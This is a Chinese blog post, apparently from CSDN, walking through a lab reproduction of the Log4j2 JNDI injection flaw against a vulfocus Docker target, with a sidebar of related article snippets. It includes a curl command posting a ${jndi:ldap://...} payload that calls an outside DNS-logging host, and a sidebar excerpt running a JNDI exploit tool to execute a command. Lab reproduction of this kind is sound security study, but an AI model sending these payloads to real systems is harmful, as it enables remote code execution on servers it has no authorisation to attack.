log4j2 JNDI注入复现

最新推荐文章于 2024-05-11 14:09:06 发布
最新推荐文章于 2024-05-11 14:09:06 发布
阅读量6.4k 收藏 2
点赞数
分类专栏: java Spring Cloud 文章标签: 安全 docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20504373/article/details/121931110
版权

复现现象:
这个镜像使用了log4j2用来当做靶机程序
1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09
2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名
在这里插入图片描述

4、执行一个post curl -X POST -F “payload=${jndi:ldap://king.xxxx.dns.1433.eu.org/exp}” http:/xxxxx:38080/hello

5、点击获取记录

这样说明log4j2 执行了上报dns记录。但是怎么利用这个漏洞呐?
在这里插入图片描述

唐老鸭2
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Log4j的几种复现方式
weixin_48465105的博客
12-15 604
Apache-Log4j的几种复现方式 poc来自 https://github.com/tangxiaofeng7/apache-log4j-poc 1、使用./tools/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar vps IP 假设为 10.10.10.10 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc.exe” -A 10.10.10.10 [root@VM_0_16_cent
Log4j2JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2615
前言 最近Log4j2JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4j,Log4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5156
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
Java最新Log4j2JNDI注入漏洞原理分析与思考,2024最新华为Java校招面试题
最新发布
2401_84024497的博客
05-11 658
我们总是喜欢瞻仰大厂的大神们,但实际上大神也不过凡人,与菜鸟程序员相比,也就多花了几分心思,如果你再不努力,差距也只会越来越大。实际上,作为程序员,丰富自己的知识储备,提升自己的知识深度和广度是很有必要的。
Apache Log4j2 RCE漏洞利用反弹shell合集
热门推荐
good good study
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Log4j2安全 JNDI漏洞 CVE-2021-44228
Keep learing, and stay fast
12-15 1570
12 月 10 日,Apache 开源项目 Log4j 的远程代码执行漏洞(CVE-2021-44228) 被公开
log4j2_rce 项目
02-23
然而,2021年,研究人员发现了一个严重的漏洞,被称为“Log4Shell”,它源于Log4j2中的JNDI(Java Naming and Directory Interface)注入。这个漏洞允许攻击者通过操纵日志记录消息来执行任意远程代码,从而对受影响...
log4j2-2.15.0RC2
12-17
2021年12月初,一个名为CVE-2021-44228的严重漏洞被公开,该漏洞影响了Log4j2的2.x版本,允许攻击者通过注入恶意代码来控制受影响的系统。这个漏洞被称为“Log4Shell”,其危害程度极高,因为它只需要在日志消息中...
log4j2升级包2.15和2.16
12-14
标题提到的"Log4j2升级包2.15和2.16"主要关注的是Log4j2框架的安全更新,尤其是针对CVE-2021-44228(Apache Log4j2 JNDI注入漏洞)的修复。 描述中的内容虽然简洁,但暗示了这次升级的主要目的是解决安全问题。Log4...
扫描log4j2 版本扫描log4j2 版本
12-16
2021年,Log4j2曝出了一次重大安全事件,被称为"CVE-2021-44228",这个漏洞允许攻击者通过注入特定的JNDI(Java Naming and Directory Interface)链接来执行任意代码。这个漏洞影响了大量使用Log4j2的系统,包括...
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2591
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
URLDNS
qq_64201116的博客
12-03 1171
听说这个链子是最简单的链子之一了,但是却是来来回回看了好多遍才勉强看明白。在 ysoserial 中我们可以看见链子是这样的:简单流程:现在我们来编写类来观察如何触发DNS请求 这个类可以进行序列化,按照正常来说序列化的过程是不会进行DNS请求的,但是我们查看DNSlog平台:发现序列化的时候就发起请求了,这样有几个非常不好的地方:下图是URL类中的hashCode()方法;这里只有当hashCode不为负一的时候才会走handler发起DNS请求hashCode在初始化的时候已经被赋值成-1了:但是我
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 862
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j。
Log4j2 Jndi 漏洞原理解析、复盘
君一席
12-13 1755
“ 2021-12-10一个值得所有研发纪念的日子。” 一波操作猛如虎,下班到了凌晨2点25。 基础组件的重要性,在此次的Log4j2漏洞上反应的淋漓尽致,各种“核弹级漏洞”、“超高危” 等词汇看的我瑟瑟发抖,那么问题真的有那么严重吗?这个让大家普遍加班搞到凌晨的漏洞,到底是什么问题? 01 — 漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders
一次另类的mssql渗透之路
include_voidmain的博客
06-08 492
一次另类的mssql渗透之路
Log4j 远控JNDI漏洞: 原理?如何解决?
缘字诀的博客
12-12 2606
Log4j 远控JNDI漏洞: 原理?如何解决?
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7801
log4j漏洞原理和靶场复现
使用JNDI进行高级DNS查询
Zhiyu's Blog
06-15 3083
import java.util.*;import javax.naming.directory.*;public class DNSLookup{  public static void main(String[] args) {    try {      final Hashtable env = new Hashtable();      //设定DNS Service Provider.
log4j2挖洞原理
08-13
2. JNDI注入log4j2中的JNDI注入漏洞是指攻击者通过构造特定的日志消息,将恶意的JNDI名称传递给log4j2的lookup函数,从而导致恶意代码执行。 3. 反序列化漏洞:log4j2中的反序列化漏洞是指攻击者可以通过构造特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值